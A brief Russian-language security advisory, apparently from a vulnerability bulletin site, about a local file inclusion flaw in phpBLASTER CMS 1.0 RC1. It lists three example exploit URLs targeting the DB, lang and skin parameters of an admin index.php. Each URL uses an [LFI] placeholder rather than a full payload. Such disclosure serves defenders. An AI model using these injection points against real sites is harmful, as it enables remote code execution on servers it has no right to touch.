Программа: phpBLASTER CMS 1.0 RC1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в множественных параметрах сценарием index.php. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера.

Эксплоит:

http://localhost/path/html/admin/minibb/index.php?DB=[LFI]

http://localhost/path/html/admin/minibb/index.php?lang=[LFI]

http://localhost/path/html/admin/minibb/index.php?skin=[LFI]



Оставить мнение